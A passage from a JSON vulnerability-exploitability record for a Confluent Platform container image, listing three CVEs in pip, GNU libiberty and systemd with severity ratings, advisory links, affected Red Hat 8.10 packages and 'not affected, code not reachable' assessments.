          "url": "https://lists.apache.org/thread.html/rb1adce798445facd032870d644eb39c4baaf9c4a7dd5477d12bb6ab2@%3Cgithub.arrow.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20225"
        },
        {
          "url": "https://pip.pypa.io/en/stable/news/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20225"
        }
      ],
      "published": "2020-05-08T18:15:10+00:00",
      "updated": "2026-06-17T01:52:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform does not invoke any binaries present in the container. That assures that the vulnerable code path in the affected application is not reachable. "
      }
    },
    {
      "id": "CVE-2018-20657",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 5,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        772
      ],
      "description": "The demangle_template function in cplus-dem.c in GNU libiberty, as distributed in GNU Binutils 2.31.1, has a memory leak via a crafted string, leading to a denial of service (memory consumption), as demonstrated by cxxfilt, a related issue to CVE-2018-12698.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20657"
        },
        {
          "url": "http://www.securityfocus.com/bid/106444"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2019:3352"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20657"
        },
        {
          "url": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=88539"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2018-20657.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2019-3352.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20657"
        },
        {
          "url": "https://support.f5.com/csp/article/K62602089"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20657"
        }
      ],
      "published": "2019-01-02T14:29:00+00:00",
      "updated": "2026-06-17T01:53:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "8.5.0-28.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcc@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libstdc%2B%2B@8.5.0-28.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2018-20839",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv2",
          "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv3",
          "vector": "CVSS:3.0/AV:P/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
        }
      ],
      "description": "systemd 242 changes the VT1 mode upon a logout, which allows attackers to read cleartext passwords in certain circumstances, such as watching a shutdown, or using Ctrl-Alt-F1 and Ctrl-Alt-F2. This occurs because the KDGKBMODE (aka current keyboard mode) check is mishandled.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2018-20839"
        },
        {
          "url": "http://www.securityfocus.com/bid/108389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2018-20839"
        },
        {
          "url": "https://bugs.launchpad.net/ubuntu/+source/systemd/+bug/1803993"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/9725f1a10f80f5e0ae7d9b60547458622aeb322f"
        },
        {
          "url": "https://github.com/systemd/systemd/pull/12378"
        },
        {
          "url": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-20839"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20190530-0002/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2018-20839"
        }
      ],
      "published": "2019-05-17T04:29:00+00:00",
      "updated": "2026-06-17T01:53:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
